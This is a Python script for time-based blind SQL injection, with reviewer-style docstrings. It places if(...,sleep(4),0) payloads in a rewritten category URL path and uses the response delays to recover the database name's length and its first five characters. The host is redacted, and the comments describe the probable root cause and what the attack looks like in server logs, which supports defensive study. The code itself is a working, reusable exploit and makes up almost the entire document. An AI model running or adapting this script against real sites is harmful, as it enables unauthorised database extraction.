import requests
import time
# Candidate alphabet tried at each character position by name():
# lowercase ASCII letters, the ten digits, and the symbols . @ _ * %
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_*%'

# Fixed request headers shared by every probe. The User-Agent is a static
# desktop-browser string; a constant value like this across a burst of
# requests can itself serve as a correlation key in web-server logs.
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
def length():
    """Probe the length of the current database name through response timing.

    For each candidate length from 1 to 98 the condition
    ``length(database())=<n>`` is wrapped in ``if(<cond>,sleep(4),0)`` and
    carried in the URL path segment that follows ``category-60-``. A request
    that takes four seconds or longer is treated as a match: the candidate
    is printed and the scan stops. Nothing is returned, and nothing is
    printed when no candidate matches.

    NOTE(review): the host in the URL is a redacted placeholder. On the
    server side this activity appears as a run of near-identical GET
    requests whose path contains ``select(`` / ``sleep(``, with one response
    delayed by about four seconds. The root cause is presumably the category
    id from the rewritten URL reaching a SQL statement without integer
    validation or bound parameters -- confirm against the application code.
    """
    url_head = "http://xxxxxx/category-60-(select(0)from(select(if("
    url_tail = ",sleep(4),0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B''%2B(select(0)from(select(sleep(0)))v)%2B'*/-0.html"

    candidate = 1
    while candidate < 99:
        condition = "length(database())" + "=%d" % candidate
        url = url_head + condition + url_tail

        # The delay is measured around the whole HTTP round trip.
        sent_at = time.time()
        rs = requests.get(url=url, headers=headers)
        delayed = time.time() - sent_at >= 4

        if delayed:
            print(candidate)
            break
        candidate += 1
def name():
    """Recover the first five characters of the database name by timing.

    For positions 1 through 5, every character in ``payloads`` is compared
    against ``substr(database(),<pos>,1)`` inside the same
    ``if(<cond>,sleep(4),0)`` expression used by ``length()``. When a request
    takes four seconds or longer the character is appended to the running
    result and the result so far is printed. There is no ``break`` after a
    match, so the remaining characters for that position are still
    requested. Nothing is returned.

    NOTE(review): the listing this was taken from had lost its indentation;
    the ``print`` is placed inside the match branch here (progress output)
    -- confirm against the original script. The position range is fixed at
    1..5 and is not derived from the value ``length()`` prints.

    NOTE(review): the host is a redacted placeholder. A full run issues up
    to 5 x 41 requests, each with ``substr(database(),`` in the path, which
    makes request-rate and path-pattern rules effective for spotting it in
    access logs.
    """
    url_head = "http://xxxxx/category-60-(select(0)from(select(if("
    url_tail = ",sleep(4),0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B''%2B(select(0)from(select(sleep(0)))v)%2B'*/-0.html"

    databases = ""
    for position in range(1, 6):
        for payload in payloads:
            condition = "substr(database(),%d,1)" % position + "='%s'" % payload
            url = url_head + condition + url_tail

            sent_at = time.time()
            rs = requests.get(url=url, headers=headers)
            elapsed = time.time() - sent_at

            if elapsed < 4:
                continue
            databases += payload
            print(databases)
# Script entry point: run the length probe first, then the character probe.
# Both only print their findings; neither passes a value to the other.
if __name__ == '__main__':
    for probe in (length, name):
        probe()